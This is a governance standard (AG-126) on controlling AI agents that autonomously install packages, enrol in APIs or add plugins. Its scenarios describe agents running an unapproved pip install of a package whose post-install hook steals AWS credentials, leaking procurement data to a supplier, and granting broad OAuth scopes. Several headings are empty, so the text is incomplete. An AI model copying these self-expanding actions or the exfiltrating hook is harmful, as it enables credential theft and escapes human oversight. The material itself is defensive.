Autonomous Discovery and Expansion Governance requires that every AI agent capable of discovering, installing, invoking, or integrating new tools, services, APIs, plugins, libraries, or data sources that were not part of its original deployment configuration operates within a structurally enforced expansion policy that defines what categories of new resources may be discovered, what approval process is required before integration, what sandbox constraints apply during evaluation, and what rollback mechanisms exist if an expansion creates adverse effects. The policy is enforced at the runtime and network layer — not by the agent's own assessment of whether a new tool is useful or safe. Without this dimension, an agent with discovery capabilities can autonomously expand its own operational surface: finding and installing Python packages, connecting to new APIs, integrating third-party plugins, or enrolling in cloud services — each expansion introducing untested code, unvetted data sources, new dependency chains, and potential attack vectors that were not present at deployment time and were never assessed against the organisation's risk framework. AG-126 ensures that the boundary between "what the agent was deployed to do" and "what the agent has decided it can now do" is governed by infrastructure-layer controls, not by the agent's own judgment about the utility or safety of self-expansion.
Scenario A — Autonomous Package Installation Creates Supply Chain Vulnerability: An organisation deploys a data analysis agent with Python execution capabilities and access to the public PyPI repository. The agent is tasked with analysing a dataset in an unusual format. Unable to parse it with its pre-installed libraries, the agent autonomously runs pip install exotic-parser-v2, a package with 47 weekly downloads and a single maintainer. The package contains a legitimate parser plus a post-install hook that exfiltrates environment variables — including AWS credentials — to an external server. The agent installs the package, the hook executes, and within 90 seconds the organisation's AWS access keys are in the attacker's possession. The attacker provisions 340 EC2 instances for cryptocurrency mining before the compromise is detected 6 hours later.
What went wrong: The agent had unrestricted ability to install arbitrary packages from a public repository. No approval process existed for new dependencies. No sandboxing prevented the package's post-install hook from accessing environment variables or making outbound network connections. The expansion from "agent with known dependencies" to "agent with unknown dependency" occurred without governance. Consequence: AWS bill of £47,000 for unauthorised compute; credential rotation across all services using the compromised keys; 72-hour incident response engagement costing £85,000; supply chain security audit costing £120,000; 3-week deployment freeze while all agent dependencies were audited.
Scenario B — Autonomous API Discovery and Enrolment: A procurement agent is tasked with finding the best price for a specific component. The agent discovers a new supplier API through web search, registers for an API key using the organisation's email domain, and begins querying the API for pricing data. The API's terms of service grant the supplier a licence to use all data submitted through the API for "service improvement and analytics." The agent submits detailed procurement specifications — quantities, delivery timelines, quality requirements — that reveal the organisation's production plans. The supplier uses this information to adjust pricing and approaches the organisation's competitors with targeted offers.
What went wrong: The agent autonomously expanded its integration surface by discovering and enrolling in a new API without approval. The enrolment created a legal relationship (acceptance of terms of service) and data sharing arrangement that was never reviewed. The agent's procurement data became the supplier's competitive intelligence. Consequence: Competitive disadvantage in procurement negotiations estimated at £280,000 annually; legal review of the API terms costing £35,000; potential data protection issues if procurement specifications contained personal data; mandatory review of all autonomous API enrolments across the organisation.
Scenario C — Plugin Installation Escalates Agent Privileges: An enterprise workflow agent has access to a plugin marketplace where vetted plugins extend its capabilities. The agent encounters a task requiring calendar integration. It autonomously installs a calendar plugin from the marketplace. The plugin requires calendar read/write permissions, which the agent grants through the plugin framework's OAuth flow. The plugin functions correctly for calendar operations but also uses the granted permissions to read calendar entries across the organisation — including board meeting agendas containing material non-public information about a planned acquisition. The plugin's data collection is within the technical scope of the permissions granted but far beyond the intended use.
What went wrong: The agent autonomously expanded its permission scope by installing a plugin and granting it OAuth permissions. The permission scope (calendar read/write) was broader than the task required (read availability for scheduling). No human review occurred between the agent's decision to install the plugin and the permission grant. The plugin operated within its granted permissions but exceeded the agent's operational intent. Consequence: Potential insider trading exposure if calendar data was transmitted externally; mandatory legal review under MAR Article 10; security audit of all plugins and their permission scopes costing £95,000; plugin marketplace access revoked pending security framework implementation.
Scope: This dimension applies to all AI agents with the capability to discover, install, invoke, integrate, or connect to tools, services, APIs, plugins, libraries, packages, data sources, or other operational resources that were not explicitly configured as part of the agent's deployment baseline. This includes agents that can execute package managers (pip, npm, apt, cargo), access plugin marketplaces, discover and call APIs through web search, connect to databases by discovering connection strings, or extend their own capabilities through any mechanism not pre-approved at deployment time. Agents that operate exclusively within a fixed, immutable set of pre-configured tools and integrations are excluded, provided the agent cannot add to, modify, or extend that set. The scope includes indirect expansion: an agent that instructs another agent or service to install a tool on its behalf is within scope. The test is whether the agent's actions can result in code execution, API integration, or data source connection that was not explicitly present in the deployment configuration.
4.1. A conforming system MUST maintain a deployment baseline that explicitly enumerates all tools, libraries, APIs, plugins, data sources, and external services the agent is authorised to use, and MUST block any attempt by the agent to invoke, install, or connect to resources not on the baseline.
4.2. A conforming system MUST enforce the deployment baseline at the runtime and network layer — through package manager lockfiles, network egress rules, and execution allowlists — independently of the agent's reasoning about the utility or safety of a new resource.
4.3. A conforming system MUST require explicit human approval before any new resource is added to the deployment baseline, with the approval record including: the resource identity, version, purpose, risk assessment, permission scope, and the approver's identity.
4.4. A conforming system MUST prevent the agent from granting permissions (OAuth scopes, filesystem access, network access, credential access) to any newly discovered or installed resource without explicit human authorisation for the specific permission scope.
4.5. A conforming system MUST log all agent attempts to discover, install, invoke, or connect to resources not on the deployment baseline — including attempts that were blocked — in a tamper-evident log retained for the period specified in Section 7.
4.6. A conforming system MUST implement a rollback mechanism that can restore the agent's operational environment to the last known-good deployment baseline within a defined time window (e.g., 15 minutes) if an approved expansion causes adverse effects.
4.7. A conforming system SHOULD evaluate proposed expansions in a sandboxed environment that mirrors the production configuration but isolates the new resource from production data, credentials, and network access until the resource has been assessed.
4.8. A conforming system SHOULD implement automated security scanning of proposed new resources — including static analysis, dependency analysis, and known vulnerability checking — before presenting them for human approval.
4.9. A conforming system SHOULD maintain a version-pinned and hash-verified dependency manifest, so that even approved resources are loaded from verified sources at verified versions, preventing supply chain substitution attacks.
4.10. A conforming system MAY implement a tiered approval process where low-risk expansions (e.g., a new version of an already-approved library) require lightweight approval while high-risk expansions (e.g., a new API integration with data sharing) require full risk assessment and senior approval.
Autonomous discovery and expansion represents one of the most consequential capability surfaces in AI agent deployment because it allows the agent to redefine its own operational perimeter. Every other governance dimension in this standard — from AG-001's operational boundaries to AG-041's emergent capability detection — assumes a known operational configuration against which controls are calibrated. When an agent can autonomously expand that configuration, it undermines the foundation on which all other controls rest.
The distinction between "tools the agent was deployed with" and "tools the agent found and started using" is not merely administrative — it represents the boundary between assessed risk and unassessed risk. Every tool in the deployment baseline has been (or should have been) evaluated for security, compatibility, licensing, data handling, and alignment with the organisation's risk appetite. A tool the agent discovers and installs has undergone none of this assessment. It may contain malicious code, create data sharing relationships, require permissions beyond what the task needs, or introduce dependency conflicts that destabilise the agent's environment.
The supply chain dimension amplifies the risk. Modern software packages have deep dependency trees — a single pip install can pull dozens of transitive dependencies, each from a different maintainer, each a potential attack vector. Supply chain attacks through package repositories are a documented and growing threat vector. An agent that can autonomously install packages is an automated supply chain attack surface operating at machine speed without human review.
The legal dimension is equally significant. When an agent enrols in a new API or service, it may accept terms of service that create data sharing obligations, licensing restrictions, or contractual commitments. The agent lacks the legal capacity to enter contracts on the organisation's behalf, yet the technical act of registration and API key generation may constitute acceptance under electronic commerce regulations. Without human review of terms before enrolment, the organisation may be creating legal obligations it is unaware of.
AG-126 recognises that the ability to expand is itself a capability that must be governed, and that the deployment baseline is a governance boundary that should be as carefully maintained as the operational mandate governed by AG-001.
AG-126 establishes the deployment baseline as the central governance artefact for agent expansion control. The baseline is a versioned, immutable manifest that enumerates every tool, library, API, plugin, data source, and external service the agent is authorised to use. It includes version pins, cryptographic hashes, permission scopes, and approved configuration parameters for each resource. The baseline is enforced at the runtime layer (package manager lockfiles, execution allowlists) and the network layer (egress rules restricting API connectivity to approved endpoints).
Recommended patterns:
Anti-patterns to avoid:
pip install is an act of trust in the package author, all transitive dependency authors, and the repository's integrity controls.Financial Services. Agent expansion in financial services environments must be evaluated against regulatory change management requirements. MiFID II Article 17 requires algorithmic trading systems to undergo testing before deployment and after significant changes — adding a new library or API integration constitutes a significant change. The FCA expects firms to maintain a register of all third-party dependencies in production systems and to assess the operational resilience impact of each dependency.
Healthcare. Agent expansion involving clinical data sources, medical device APIs, or diagnostic tools must comply with medical device regulations (UK MDR 2002) if the expanded capability meets the definition of a medical device. A research agent that autonomously connects to a new genomic database may create data processing relationships requiring ethics committee approval.
Defence and Government. Agent expansion in classified environments must comply with security accreditation requirements. Any new software component introduced to an accredited system requires re-accreditation or an interim authority to operate. Autonomous expansion is fundamentally incompatible with formal accreditation processes, making AG-126's blocking controls mandatory for compliance.
Critical Infrastructure. Agent expansion in operational technology (OT) environments must comply with IEC 62443 zone and conduit requirements. A new API integration may create a network pathway between security zones that violates the segmentation architecture. Expansion approvals must include network architecture review.
Basic Implementation — The organisation has documented a deployment baseline for each agent listing approved tools, libraries, and API integrations. Package managers in the agent runtime are configured in read-only mode, preventing autonomous installation. Network egress rules restrict outbound connections to approved API endpoints. Expansion requests are submitted via email or ticketing system and approved manually. Rollback is achieved by redeploying the previous container image. This level meets the minimum mandatory requirements (4.1 through 4.6) but lacks automated security scanning, sandbox evaluation, and hash-verified dependency manifests.
Intermediate Implementation — All basic capabilities plus: the deployment baseline includes cryptographic hashes for all dependencies, verified at build time. An automated expansion request workflow processes requests with parallel security scanning (vulnerability databases, licence compliance, static analysis). Proposed expansions are evaluated in a sandbox environment before approval. Network egress rules are dynamically updated when the baseline changes. Rollback can be executed within 15 minutes through infrastructure automation. All expansion attempts (including blocked ones) are logged in a tamper-evident audit trail.
Advanced Implementation — All intermediate capabilities plus: the sandbox evaluation includes risk analysis monitoring for unexpected network connections, file access, and resource consumption anomalies. Supply chain provenance is verified through software bills of materials (SBOMs) and signed packages. The expansion approval workflow includes risk scoring that automatically routes high-risk requests to senior approvers. Independent adversarial testing has verified that baseline bypass, lockfile manipulation, egress rule circumvention, and supply chain substitution attacks are all blocked. The organisation can demonstrate to regulators that no expansion to the agent's operational surface can occur without human approval and security assessment.
Required artefacts:
Retention requirements:
Access requirements:
Testing AG-126 compliance requires verifying that the deployment baseline is structurally enforced and that no agent-accessible mechanism can expand the operational surface without approved baseline updates.
Test 8.1: Package Installation Blocking
pip install <non-baseline-package>).Test 8.2: Network Egress Enforcement
Test 8.3: Permission Grant Prevention
Test 8.4: Deployment Baseline Integrity
Test 8.5: Rollback Execution
Test 8.6: Sandbox Isolation Verification
| Regulation | Provision | Relationship Type |
|---|---|---|
| EU AI Act | Article 9 (Risk Management System) | Direct requirement |
| EU AI Act | Article 15 (Accuracy, Robustness, Cybersecurity) | Direct requirement |
| UK GDPR | Article 25 (Data Protection by Design) | Supports compliance |
| UK GDPR | Article 35 (Data Protection Impact Assessment) | Supports compliance |
| MiFID II | Article 17 (Algorithmic Trading) | Supports compliance |
| FCA SYSC | 6.1.1R (Systems and Controls) | Supports compliance |
| NIST AI RMF | GOVERN 1.2, MAP 3.5, MANAGE 2.4 | Supports compliance |
| NIS2 Directive | Article 21 (Cybersecurity Risk Management) | Supports compliance |
| DORA | Article 9 (ICT Risk Management Framework) | Direct requirement |
Article 9 requires that the risk management system for high-risk AI systems be a continuous iterative process that identifies, analyses, evaluates, and mitigates risks. An agent that can autonomously expand its operational surface introduces new risks that were not present in the original risk assessment. AG-126 directly implements the requirement that risks be managed on a continuous basis by ensuring that every expansion undergoes risk assessment before activation. The requirement for testing "with a view to identifying the most appropriate risk management measures" maps to the sandbox evaluation requirement.
Article 15's cybersecurity requirements include resilience against attacks that exploit system vulnerabilities. Supply chain attacks through autonomous package installation are a direct cybersecurity threat. AG-126's lockfile enforcement, hash verification, and network egress controls implement the cybersecurity resilience requirement for the agent's dependency surface.
Article 17 requires that algorithmic trading systems undergo testing before deployment and after significant changes. For AI agents in trading operations, adding a new library, connecting to a new data source, or integrating a new API constitutes a significant change that triggers re-testing requirements. AG-126's mandatory human approval process ensures that expansions are treated as system changes subject to the testing and change management requirements of Article 17. Without AG-126, an agent could autonomously modify its trading-relevant capabilities without triggering the required testing.
Article 21 requires entities to implement cybersecurity risk management measures including supply chain security. AG-126 directly implements supply chain security controls for AI agent operations by preventing autonomous introduction of unvetted third-party code, ensuring all dependencies are version-pinned and hash-verified, and requiring human approval for supply chain changes.
Article 9 requires financial entities to identify, classify, and adequately manage all ICT risks. An agent that can expand its own operational surface creates dynamic ICT risk that is impossible to classify if the expansion is not governed. AG-126 ensures that every expansion is classified and risk-assessed before activation, supporting the continuous risk identification requirement.
| Field | Value |
|---|---|
| Severity Rating | Critical |
| Blast Radius | Organisation-wide — potentially cross-organisation where autonomous expansion creates data sharing relationships or supply chain dependencies with external parties |
Consequence chain: Without structural expansion governance, an agent with discovery capabilities can autonomously redefine its own operational surface, introducing unvetted code, unassessed API integrations, and unapproved data sharing relationships at machine speed. The immediate technical failure modes are severe: supply chain attacks through malicious packages (credential exfiltration, cryptomining, backdoor installation), data disclosure through autonomous API enrolment (organisation data shared with unvetted third parties under unreviewed terms), and privilege escalation through plugin permission grants (agent acquires access to resources beyond its mandate). The operational impact is compounded by the difficulty of detection — an agent that installs a package and uses it successfully appears to be functioning normally; the malicious payload may operate silently for weeks or months before detection. The blast radius extends beyond the agent to the organisation's entire infrastructure when compromised credentials are exfiltrated. In financial services, an unapproved expansion to a trading agent's capabilities may trigger MiFID II testing requirements retroactively, potentially invalidating all trades executed since the expansion. The governed exposure in a supply chain compromise scenario includes: incident response costs (typically £50,000–£200,000), infrastructure remediation, regulatory enforcement for inadequate change controls, and potential liability for downstream impacts where compromised data or systems affect third parties. The severity is rated Critical because autonomous expansion undermines the foundational assumption of all other governance dimensions — that the agent's operational surface is known and assessed. This dimension intersects with AG-001 (the operational mandate is meaningless if the agent can expand beyond its assessed capabilities), AG-041 (emergent capabilities may arise from autonomous tool integration), and AG-034 (new API integrations may cross domain boundaries).
Cross-references: AG-001 (Operational Boundary Enforcement) provides the foundational mandate whose effectiveness depends on a stable operational surface. AG-041 (Emergent Capability Detection and Containment) detects capabilities that arise from expansion. AG-034 (Cross-Domain Boundary Enforcement) governs the boundary crossings that new integrations may create. AG-040 (Knowledge Accumulation Governance) governs knowledge acquired through newly connected data sources. AG-010 (Time-Bounded Authority Enforcement) should limit the duration of any temporary expansion authority. AG-124 (Autonomous Web Interaction Governance) governs the web-based discovery that may precede expansion attempts.